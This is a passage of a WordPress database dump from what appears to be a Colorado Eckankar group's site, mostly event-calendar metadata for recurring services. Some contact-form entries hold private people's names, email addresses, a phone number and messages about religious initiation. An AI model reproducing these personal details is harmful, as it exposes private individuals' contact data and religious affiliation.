10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118899,262956,'boldgrid_hide_page_title','0'),(118888,262956,'_EventDuration','4500'),(119272,262969,'_RTECregistrationsDisabled','1'),(119273,262969,'_RTECdeadlineType','start'),(119270,262969,'_EventOrigin','events-calendar'),(119278,262969,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119279,262969,'_EventShowMapLink','1'),(119280,262969,'_EventShowMap','1'),(119281,262969,'_EventVenueID','262507'),(119274,262969,'_RTECwhoCanRegister','any'),(84607,257577,'boldgrid_hide_page_title','1'),(84621,257577,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119275,262969,'_RTEClimitRegistrations','0'),(84622,257577,'_EventShowMapLink','1'),(84623,257577,'_EventShowMap','1'),(84624,257577,'_EventVenueID','52069'),(84625,257577,'_EventStartDate','2020-02-13 18:00:00'),(84626,257577,'_EventEndDate','2020-02-13 19:30:00'),(84627,257577,'_EventStartDateUTC','2020-02-14 01:00:00'),(84628,257577,'_EventEndDateUTC','2020-02-14 02:30:00'),(84629,257577,'_EventDuration','5400'),(84630,257577,'_EventCurrencySymbol',''),(84631,257577,'_EventCurrencyPosition','prefix'),(84632,257577,'_EventCost',''),(84633,257577,'_EventURL',''),(84634,257577,'_EventTimezone','America/Denver'),(84635,257577,'_EventTimezoneAbbr','MST'),(84673,257613,'protect_children',''),(84674,257613,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1580470066;s:12:\"_EventOrigin\";i:1580470066;s:13:\"_thumbnail_id\";i:1580470066;s:24:\"boldgrid_hide_page_title\";i:1580470066;s:16:\"_EventRecurrence\";i:1607076029;s:17:\"_EventShowMapLink\";i:1580470066;s:13:\"_EventShowMap\";i:1580470066;s:13:\"_EventVenueID\";i:1580470066;s:15:\"_EventStartDate\";i:1580470185;s:13:\"_EventEndDate\";i:1580470185;s:18:\"_EventStartDateUTC\";i:1580470185;s:16:\"_EventEndDateUTC\";i:1580470185;s:14:\"_EventDuration\";i:1580470066;s:20:\"_EventCurrencySymbol\";i:1580470066;s:22:\"_EventCurrencyPosition\";i:1580470066;s:10:\"_EventCost\";i:1580470066;s:9:\"_EventURL\";i:1580470066;s:14:\"_EventTimezone\";i:1580470066;s:18:\"_EventTimezoneAbbr\";i:1580470066;s:16:\"tribe_events_cat\";i:1580495266;s:12:\"_dp_original\";i:1580470066;s:10:\"_edit_last\";i:1580470134;s:10:\"post_title\";i:1580470134;s:12:\"post_content\";i:1580470185;s:11:\"post_status\";i:1580470185;s:26:\"_RTECregistrationsDisabled\";i:1607076029;s:17:\"_RTECdeadlineType\";i:1607076029;s:19:\"_RTECwhoCanRegister\";i:1607076029;s:23:\"_RTEClimitRegistrations\";i:1607076029;s:21:\"_RTECmaxRegistrations\";i:1607076029;s:22:\"_EventHideFromUpcoming\";i:1607076029;}'),(84675,257613,'_EventOrigin','events-calendar'),(84676,257613,'protect_children',''),(84677,257613,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1580470066;s:12:\"_EventOrigin\";i:1580470066;s:13:\"_thumbnail_id\";i:1580470066;s:24:\"boldgrid_hide_page_title\";i:1580470066;s:16:\"_EventRecurrence\";i:1607076029;s:17:\"_EventShowMapLink\";i:1580470066;s:13:\"_EventShowMap\";i:1580470066;s:13:\"_EventVenueID\";i:1580470066;s:15:\"_EventStartDate\";i:1580470185;s:13:\"_EventEndDate\";i:1580470185;s:18:\"_EventStartDateUTC\";i:1580470185;s:16:\"_EventEndDateUTC\";i:1580470185;s:14:\"_EventDuration\";i:1580470066;s:20:\"_EventCurrencySymbol\";i:1580470066;s:22:\"_EventCurrencyPosition\";i:1580470066;s:10:\"_EventCost\";i:1580470066;s:9:\"_EventURL\";i:1580470066;s:14:\"_EventTimezone\";i:1580470066;s:18:\"_EventTimezoneAbbr\";i:1580470066;s:16:\"tribe_events_cat\";i:1580495266;s:12:\"_dp_original\";i:1580470066;s:10:\"_edit_last\";i:1580470134;s:10:\"post_title\";i:1580470134;s:12:\"post_content\";i:1580470185;s:11:\"post_status\";i:1580470185;s:26:\"_RTECregistrationsDisabled\";i:1607076029;s:17:\"_RTECdeadlineType\";i:1607076029;s:19:\"_RTECwhoCanRegister\";i:1607076029;s:23:\"_RTEClimitRegistrations\";i:1607076029;s:21:\"_RTECmaxRegistrations\";i:1607076029;s:22:\"_EventHideFromUpcoming\";i:1607076029;}'),(84680,257613,'boldgrid_hide_page_title','1'),(84681,257613,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(84678,257613,'_EventOrigin','events-calendar'),(84682,257613,'_EventShowMapLink','1'),(84683,257613,'_EventShowMap','1'),(84684,257613,'_EventVenueID','52069'),(84685,257613,'_EventStartDate','2020-02-18 11:00:00'),(84686,257613,'_EventEndDate','2020-02-18 12:30:00'),(84687,257613,'_EventStartDateUTC','2020-02-18 18:00:00'),(84688,257613,'_EventEndDateUTC','2020-02-18 19:30:00'),(84689,257613,'_EventDuration','5400'),(84690,257613,'_EventCurrencySymbol',''),(84691,257613,'_EventCurrencyPosition','prefix'),(84692,257613,'_EventCost',''),(84693,257613,'_EventURL',''),(84694,257613,'_EventTimezone','America/Denver'),(84695,257613,'_EventTimezoneAbbr','MST'),(84696,257613,'_dp_original','257577'),(84697,257613,'_edit_lock','1607101233:2'),(84706,257613,'_edit_last','2'),(119268,262969,'protect_children',''),(119262,262969,'_EventStartDate','2021-07-18 09:00:00'),(119263,262969,'_EventStartDateUTC','2021-07-18 15:00:00'),(119277,262969,'boldgrid_hide_page_title','0'),(119264,262969,'_EventEndDate','2021-07-18 10:15:00'),(119265,262969,'_EventEndDateUTC','2021-07-18 16:15:00'),(119266,262969,'_EventDuration','4500'),(119267,262969,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545641;s:16:\"protect_children\";i:1607545641;s:13:\"_thumbnail_id\";i:1607545641;s:26:\"_RTECregistrationsDisabled\";i:1607545641;s:17:\"_RTECdeadlineType\";i:1607545641;s:19:\"_RTECwhoCanRegister\";i:1607545641;s:23:\"_RTEClimitRegistrations\";i:1607545641;s:21:\"_RTECmaxRegistrations\";i:1607545641;s:24:\"boldgrid_hide_page_title\";i:1607545641;s:16:\"_EventRecurrence\";i:1607545641;s:17:\"_EventShowMapLink\";i:1607545641;s:13:\"_EventShowMap\";i:1607545641;s:13:\"_EventVenueID\";i:1607545641;s:20:\"_EventCurrencySymbol\";i:1607545642;s:22:\"_EventCurrencyPosition\";i:1607545642;s:10:\"_EventCost\";i:1607545642;s:9:\"_EventURL\";i:1607545642;s:14:\"_EventTimezone\";i:1607545642;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545642;s:16:\"tribe_events_cat\";i:1607570842;}'),(119269,262969,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545641;s:16:\"protect_children\";i:1607545641;s:13:\"_thumbnail_id\";i:1607545641;s:26:\"_RTECregistrationsDisabled\";i:1607545641;s:17:\"_RTECdeadlineType\";i:1607545641;s:19:\"_RTECwhoCanRegister\";i:1607545641;s:23:\"_RTEClimitRegistrations\";i:1607545641;s:21:\"_RTECmaxRegistrations\";i:1607545641;s:24:\"boldgrid_hide_page_title\";i:1607545641;s:16:\"_EventRecurrence\";i:1607545641;s:17:\"_EventShowMapLink\";i:1607545641;s:13:\"_EventShowMap\";i:1607545641;s:13:\"_EventVenueID\";i:1607545641;s:20:\"_EventCurrencySymbol\";i:1607545642;s:22:\"_EventCurrencyPosition\";i:1607545642;s:10:\"_EventCost\";i:1607545642;s:9:\"_EventURL\";i:1607545642;s:14:\"_EventTimezone\";i:1607545642;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545642;s:16:\"tribe_events_cat\";i:1607570842;}'),(119258,262968,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4500;}i:1;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4500;}i:2;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4500;}i:3;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4500;}i:4;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4500;}i:5;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4500;}i:6;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4500;}i:7;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4500;}i:8;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4500;}i:9;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4500;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(119255,262968,'_EventCost',''),(119250,262968,'_EventShowMapLink','1'),(119251,262968,'_EventShowMap','1'),(119252,262968,'_EventVenueID','262507'),(119253,262968,'_EventCurrencySymbol',''),(119254,262968,'_EventCurrencyPosition','prefix'),(88131,259055,'protect_children',''),(88132,259055,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1582816274;s:12:\"_EventOrigin\";i:1582816274;s:13:\"_thumbnail_id\";i:1582816274;s:24:\"boldgrid_hide_page_title\";i:1582816274;s:17:\"_EventShowMapLink\";i:1582816274;s:13:\"_EventShowMap\";i:1582816274;s:13:\"_EventVenueID\";i:1582816274;s:15:\"_EventStartDate\";i:1582816509;s:13:\"_EventEndDate\";i:1582816509;s:18:\"_EventStartDateUTC\";i:1582816509;s:16:\"_EventEndDateUTC\";i:1582816509;s:14:\"_EventDuration\";i:1582816509;s:20:\"_EventCurrencySymbol\";i:1582816274;s:22:\"_EventCurrencyPosition\";i:1582816274;s:10:\"_EventCost\";i:1582816274;s:9:\"_EventURL\";i:1582816274;s:14:\"_EventTimezone\";i:1582816274;s:18:\"_EventTimezoneAbbr\";i:1582816509;s:12:\"_dp_original\";i:1582816274;s:16:\"tribe_events_cat\";i:1582841474;s:10:\"_edit_last\";i:1582816340;s:10:\"post_title\";i:1582816340;s:12:\"post_content\";i:1582816509;s:16:\"_EventRecurrence\";i:1606927730;s:11:\"post_status\";i:1582816509;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606927731;s:26:\"_RTECregistrationsDisabled\";i:1606927730;s:17:\"_RTECdeadlineType\";i:1606927730;s:19:\"_RTECwhoCanRegister\";i:1606927730;s:23:\"_RTEClimitRegistrations\";i:1606927730;s:21:\"_RTECmaxRegistrations\";i:1606927730;s:22:\"_EventHideFromUpcoming\";i:1606927730;}'),(88128,259055,'_EventOrigin','events-calendar'),(88129,259055,'protect_children',''),(88130,259055,'protect_children',''),(119187,262966,'_RTECwhoCanRegister','any'),(119188,262966,'_RTEClimitRegistrations','0'),(119189,262966,'_RTECmaxRegistrations','30'),(119190,262966,'boldgrid_hide_page_title','0'),(119180,262966,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545641;s:16:\"protect_children\";i:1607545641;s:13:\"_thumbnail_id\";i:1607545641;s:26:\"_RTECregistrationsDisabled\";i:1607545641;s:17:\"_RTECdeadlineType\";i:1607545641;s:19:\"_RTECwhoCanRegister\";i:1607545641;s:23:\"_RTEClimitRegistrations\";i:1607545641;s:21:\"_RTECmaxRegistrations\";i:1607545641;s:24:\"boldgrid_hide_page_title\";i:1607545641;s:16:\"_EventRecurrence\";i:1607545641;s:17:\"_EventShowMapLink\";i:1607545641;s:13:\"_EventShowMap\";i:1607545641;s:13:\"_EventVenueID\";i:1607545641;s:20:\"_EventCurrencySymbol\";i:1607545641;s:22:\"_EventCurrencyPosition\";i:1607545641;s:10:\"_EventCost\";i:1607545641;s:9:\"_EventURL\";i:1607545641;s:14:\"_EventTimezone\";i:1607545641;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545641;s:16:\"tribe_events_cat\";i:1607570841;}'),(119179,262966,'_EventDuration','4500'),(88126,259055,'protect_children',''),(88127,259055,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1582816274;s:12:\"_EventOrigin\";i:1582816274;s:13:\"_thumbnail_id\";i:1582816274;s:24:\"boldgrid_hide_page_title\";i:1582816274;s:17:\"_EventShowMapLink\";i:1582816274;s:13:\"_EventShowMap\";i:1582816274;s:13:\"_EventVenueID\";i:1582816274;s:15:\"_EventStartDate\";i:1582816509;s:13:\"_EventEndDate\";i:1582816509;s:18:\"_EventStartDateUTC\";i:1582816509;s:16:\"_EventEndDateUTC\";i:1582816509;s:14:\"_EventDuration\";i:1582816509;s:20:\"_EventCurrencySymbol\";i:1582816274;s:22:\"_EventCurrencyPosition\";i:1582816274;s:10:\"_EventCost\";i:1582816274;s:9:\"_EventURL\";i:1582816274;s:14:\"_EventTimezone\";i:1582816274;s:18:\"_EventTimezoneAbbr\";i:1582816509;s:12:\"_dp_original\";i:1582816274;s:16:\"tribe_events_cat\";i:1582841474;s:10:\"_edit_last\";i:1582816340;s:10:\"post_title\";i:1582816340;s:12:\"post_content\";i:1582816509;s:16:\"_EventRecurrence\";i:1606927730;s:11:\"post_status\";i:1582816509;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606927731;s:26:\"_RTECregistrationsDisabled\";i:1606927730;s:17:\"_RTECdeadlineType\";i:1606927730;s:19:\"_RTECwhoCanRegister\";i:1606927730;s:23:\"_RTEClimitRegistrations\";i:1606927730;s:21:\"_RTECmaxRegistrations\";i:1606927730;s:22:\"_EventHideFromUpcoming\";i:1606927730;}'),(119185,262966,'_RTECregistrationsDisabled','1'),(119181,262966,'protect_children',''),(119175,262966,'_EventStartDate','2021-04-18 09:00:00'),(119176,262966,'_EventStartDateUTC','2021-04-18 15:00:00'),(119177,262966,'_EventEndDate','2021-04-18 10:15:00'),(119182,262966,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545641;s:16:\"protect_children\";i:1607545641;s:13:\"_thumbnail_id\";i:1607545641;s:26:\"_RTECregistrationsDisabled\";i:1607545641;s:17:\"_RTECdeadlineType\";i:1607545641;s:19:\"_RTECwhoCanRegister\";i:1607545641;s:23:\"_RTEClimitRegistrations\";i:1607545641;s:21:\"_RTECmaxRegistrations\";i:1607545641;s:24:\"boldgrid_hide_page_title\";i:1607545641;s:16:\"_EventRecurrence\";i:1607545641;s:17:\"_EventShowMapLink\";i:1607545641;s:13:\"_EventShowMap\";i:1607545641;s:13:\"_EventVenueID\";i:1607545641;s:20:\"_EventCurrencySymbol\";i:1607545641;s:22:\"_EventCurrencyPosition\";i:1607545641;s:10:\"_EventCost\";i:1607545641;s:9:\"_EventURL\";i:1607545641;s:14:\"_EventTimezone\";i:1607545641;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545641;s:16:\"tribe_events_cat\";i:1607570841;}'),(119178,262966,'_EventEndDateUTC','2021-04-18 16:15:00'),(119169,262965,'_EventURL',''),(119170,262965,'_EventTimezone','America/Denver'),(119171,262965,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4500;}i:1;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4500;}i:2;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4500;}i:3;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4500;}i:4;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4500;}i:5;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4500;}i:6;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4500;}i:7;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4500;}i:8;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4500;}i:9;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4500;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(119167,262965,'_EventCurrencyPosition','prefix'),(104288,257613,'_RTECregistrationsDisabled','1'),(119163,262965,'_EventShowMapLink','1'),(119164,262965,'_EventShowMap','1'),(119165,262965,'_EventVenueID','262507'),(119166,262965,'_EventCurrencySymbol',''),(119162,262965,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119154,262965,'_EventOrigin','events-calendar'),(119156,262965,'_RTECregistrationsDisabled','1'),(119157,262965,'_RTECdeadlineType','start'),(119158,262965,'_RTECwhoCanRegister','any'),(119159,262965,'_RTEClimitRegistrations','0'),(119160,262965,'_RTECmaxRegistrations','30'),(119142,262964,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4500;}i:1;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4500;}i:2;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4500;}i:3;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4500;}i:4;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4500;}i:5;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4500;}i:6;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4500;}i:7;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4500;}i:8;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4500;}i:9;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4500;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(119138,262964,'_EventCurrencyPosition','prefix'),(119139,262964,'_EventCost',''),(119140,262964,'_EventURL',''),(119141,262964,'_EventTimezone','America/Denver'),(119137,262964,'_EventCurrencySymbol',''),(119134,262964,'_EventShowMapLink','1'),(119135,262964,'_EventShowMap','1'),(119136,262964,'_EventVenueID','262507'),(119127,262964,'_RTECregistrationsDisabled','1'),(119128,262964,'_RTECdeadlineType','start'),(119129,262964,'_RTECwhoCanRegister','any'),(119125,262964,'_EventOrigin','events-calendar'),(119133,262964,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119130,262964,'_RTEClimitRegistrations','0'),(119131,262964,'_RTECmaxRegistrations','30'),(119123,262964,'protect_children',''),(119117,262964,'_EventStartDate','2021-02-21 09:00:00'),(119118,262964,'_EventStartDateUTC','2021-02-21 16:00:00'),(119119,262964,'_EventEndDate','2021-02-21 10:15:00'),(119132,262964,'boldgrid_hide_page_title','0'),(119120,262964,'_EventEndDateUTC','2021-02-21 17:15:00'),(119121,262964,'_EventDuration','4500'),(119122,262964,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545641;s:16:\"protect_children\";i:1607545641;s:13:\"_thumbnail_id\";i:1607545641;s:26:\"_RTECregistrationsDisabled\";i:1607545641;s:17:\"_RTECdeadlineType\";i:1607545641;s:19:\"_RTECwhoCanRegister\";i:1607545641;s:23:\"_RTEClimitRegistrations\";i:1607545641;s:21:\"_RTECmaxRegistrations\";i:1607545641;s:24:\"boldgrid_hide_page_title\";i:1607545641;s:16:\"_EventRecurrence\";i:1607545641;s:17:\"_EventShowMapLink\";i:1607545641;s:13:\"_EventShowMap\";i:1607545641;s:13:\"_EventVenueID\";i:1607545641;s:20:\"_EventCurrencySymbol\";i:1607545641;s:22:\"_EventCurrencyPosition\";i:1607545641;s:10:\"_EventCost\";i:1607545641;s:9:\"_EventURL\";i:1607545641;s:14:\"_EventTimezone\";i:1607545641;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545641;s:16:\"tribe_events_cat\";i:1607570841;}'),(119124,262964,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545641;s:16:\"protect_children\";i:1607545641;s:13:\"_thumbnail_id\";i:1607545641;s:26:\"_RTECregistrationsDisabled\";i:1607545641;s:17:\"_RTECdeadlineType\";i:1607545641;s:19:\"_RTECwhoCanRegister\";i:1607545641;s:23:\"_RTEClimitRegistrations\";i:1607545641;s:21:\"_RTECmaxRegistrations\";i:1607545641;s:24:\"boldgrid_hide_page_title\";i:1607545641;s:16:\"_EventRecurrence\";i:1607545641;s:17:\"_EventShowMapLink\";i:1607545641;s:13:\"_EventShowMap\";i:1607545641;s:13:\"_EventVenueID\";i:1607545641;s:20:\"_EventCurrencySymbol\";i:1607545641;s:22:\"_EventCurrencyPosition\";i:1607545641;s:10:\"_EventCost\";i:1607545641;s:9:\"_EventURL\";i:1607545641;s:14:\"_EventTimezone\";i:1607545641;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545641;s:16:\"tribe_events_cat\";i:1607570841;}'),(119113,262963,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4500;}i:1;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4500;}i:2;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4500;}i:3;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4500;}i:4;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4500;}i:5;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4500;}i:6;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4500;}i:7;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4500;}i:8;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4500;}i:9;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4500;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(120876,263177,'_EventOrigin','events-calendar'),(120877,263177,'_EventOrigin','events-calendar'),(116374,262857,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(85059,257823,'_field_55','Rochelle'),(85060,257823,'_field_56','Stoeklen'),(85061,257823,'_field_57','rstoeklen@comcast.net'),(85062,257823,'_field_58','(303) 217-0448'),(85063,257823,'_field_59','Denver'),(85064,257823,'_field_62','Initiator-Vickie Cashman'),(85065,257823,'_field_63','Hello, Vickie!  I hope all is well!  I have been invited to receive my Fifth Initiation and am wondering if you will be my Initiator.  Thank you, and I look I forward to talking with you!   \n\n--Rochelle'),(85066,257823,'_form_id','6'),(85067,257823,'_seq_num','2'),(85068,257824,'_field_224','Jacqueline'),(85069,257824,'_field_225','Olamigoke'),(85070,257824,'_field_226','jolamigoke@hotmail.com'),(85071,257824,'_field_227','CO'),(85072,257824,'_field_228','US'),(85073,257824,'_field_229','a:1:{i:0;s:8:\"Loveland\";}'),(85074,257824,'_form_id','21'),(85075,257824,'_seq_num','88'),(90417,260418,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2020/03/H.I.-Registration-PORTRAIT-final.pdf - cannot be optimized, it has an invalid file type'),(90385,260418,'_edit_lock','1583601942:2'),(90384,260418,'_wp_attached_file','2020/03/H.I.-Registration-PORTRAIT-final.pdf'),(85326,258076,'_wp_attached_file','2020/02/eck-on-youtube-sized-f.png'),(85327,258076,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:235;s:6:\"height\";i:147;s:4:\"file\";s:34:\"2020/02/eck-on-youtube-sized-f.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"eck-on-youtube-sized-f-150x147.png\";s:5:\"width\";i:150;s:6:\"height\";i:147;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:32:\"eck-on-youtube-sized-f-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:34:\"eck-on-youtube-sized-f-210x147.png\";s:5:\"width\";i:210;s:6:\"height\";i:147;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(85328,258076,'_wp_attachment_image_alt','ECK On Youtube'),(86147,258547,'_field_133','jose'),(85878,258360,'original-file','2020/02/shariyat-ki-sugmad-book-2-updraft-pre-smush-original.jpg'),(85879,258360,'smush-info','The file was compressed from 6.54 KB to 6.02 KB saving 7.9 percent using WP-Optimize'),(85881,258360,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:6697;s:12:\"smushed-size\";i:6168;s:15:\"savings-percent\";d:7.9;}'),(85880,258360,'smush-complete','1'),(85882,258359,'original-file','2020/02/shariyat-ki-sugmad-book-1-updraft-pre-smush-original.jpg'),(85883,258359,'smush-complete','1'),(85884,258359,'smush-info','The file was compressed from 6.67 KB to 6.15 KB saving 7.78 percent using WP-Optimize'),(85885,258359,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:6828;s:12:\"smushed-size\";i:6297;s:15:\"savings-percent\";d:7.78;}'),(85906,258413,'_field_133','Gailla'),(85907,258413,'_field_134','Sapphire'),(85908,258413,'_field_135','songwriter999@gmail.com'),(85909,258413,'_field_137','Regional Seminar in Sept in Denver'),(85910,258413,'_field_138','\nHi,\n\nHi,\nI am an Eckist, H.I. living in Southern California.  I write and sing original songs.  I have sung at Local Light and Sound Services as well as at Days of Eck and Regional Seminars.  I would like to submit a song or two for consideration to be performed at the regional seminar in Denver, Sept. 19-20, 2020.\nPlease let me know how I would go about that and if they are even accepting submissions outside the area.\nThank You!\nLove in Eck\nGailla\n'),(85911,258413,'_form_id','13'),(85912,258413,'_seq_num','41'),(85945,258287,'_edit_lock','1582137046:2'),(85677,258287,'_field_224','Chyris'),(85678,258287,'_field_225','Alana'),(85679,258287,'_field_226','oneworldharmony@gmail.com'),(85680,258287,'_field_227','CO'),(85681,258287,'_field_228','US'),(85682,258287,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in 